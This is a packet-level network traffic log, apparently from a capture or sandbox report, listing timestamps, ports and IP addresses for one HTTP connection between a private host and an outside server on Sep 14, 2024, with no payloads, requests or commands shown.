Sep 14, 2024 18:31:10.476077080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.476145029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476155996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476166964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476176977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476186991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476281881 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.476363897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.476742983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476752996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476763964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476774931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476808071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476819992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476831913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476843119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476897001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.476942062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.511606932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.511619091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.511630058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.511640072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.511651039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.511662006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.511681080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.511709929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.511904001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.556813955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.556878090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.556885958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.556895971 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.556941032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.556952000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.556962967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.556973934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.557009935 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.557019949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.557037115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.557046890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.557056904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.557056904 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.557066917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.557077885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.557105064 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.557137966 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.557142973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.557156086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.557164907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.557199001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.558137894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558195114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558202982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558213949 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.558221102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558232069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558276892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558285952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558295965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558312893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.558346987 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.558785915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558803082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558810949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558865070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558876038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558923960 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.558947086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.558948994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558960915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.558969975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.559012890 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.559937000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.559954882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.559963942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560003996 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560036898 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560086966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560100079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560110092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560157061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560165882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560175896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560177088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560189009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560270071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560290098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560291052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560301065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560311079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560321093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560331106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560342073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560349941 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560353994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560373068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560406923 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560406923 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560441971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560488939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560499907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560508966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560537100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560570002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560571909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560583115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560592890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560604095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560635090 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560667992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560688972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560698986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560709000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560740948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560751915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560762882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560770988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560781002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560791016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560802937 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560836077 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.560926914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560937881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560946941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560956001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560966969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560976028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560988903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.560997963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561007977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561021090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561032057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561042070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561053038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561053038 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.561100960 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.561134100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.561199903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561249018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561253071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.561256886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561269045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561276913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561307907 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.561345100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.561458111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561469078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561477900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561487913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561496973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561506987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561517000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561525106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561532974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561533928 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.561546087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561556101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561564922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561574936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561577082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.561584949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561599016 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.561635017 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.561666965 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.561794043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561831951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561840057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561875105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.561912060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561922073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561932087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561943054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561954021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.561966896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.562000990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.563162088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.563179016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.563199043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.563220024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.563229084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.563283920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.563293934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.563302040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.563313007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.563366890 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.598902941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.598917961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.598927975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.598937035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.598947048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.598956108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.598965883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.598975897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.599456072 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.644042015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644062996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644074917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644085884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644098043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644109964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644159079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644160032 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.644171953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644184113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644195080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644213915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644224882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644236088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644247055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644278049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.644402981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.644470930 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.645071030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.645174026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.645179033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.645190954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.645203114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.645215034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.645231009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.645242929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.645255089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.645409107 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.645502090 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.646318913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646375895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646387100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646414995 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.646446943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646459103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646470070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646470070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.646482944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646684885 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.646744967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646755934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646769047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646836042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646837950 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.646848917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646866083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646915913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646919966 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.646929026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.646995068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.647468090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647548914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647564888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647577047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647588968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647608042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647619963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647630930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647670984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647681952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647692919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647706985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647717953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647768974 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.647825956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647839069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647850037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647862911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647869110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.647901058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647919893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647931099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647941113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647953033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.647970915 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648005962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648019075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648030043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648034096 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648041964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648053885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648077965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648088932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648097992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648099899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648183107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648195028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648205996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648215055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648226023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648226023 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648257971 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648288012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648299932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648341894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648366928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648379087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648390055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648396015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648402929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648415089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648427010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648458004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648509026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648520947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648531914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648542881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648555994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648567915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648578882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648590088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648629904 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648653984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648667097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648677111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648693085 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648753881 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648791075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648803949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648818970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648832083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648843050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648854017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648864985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648875952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648888111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648897886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648907900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.648907900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648924112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648948908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.648989916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.649049044 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.649108887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.649168015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.649184942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.649197102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.649208069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.649241924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.649256945 CEST	80	49738	172.67.203.195	192.168.2.4
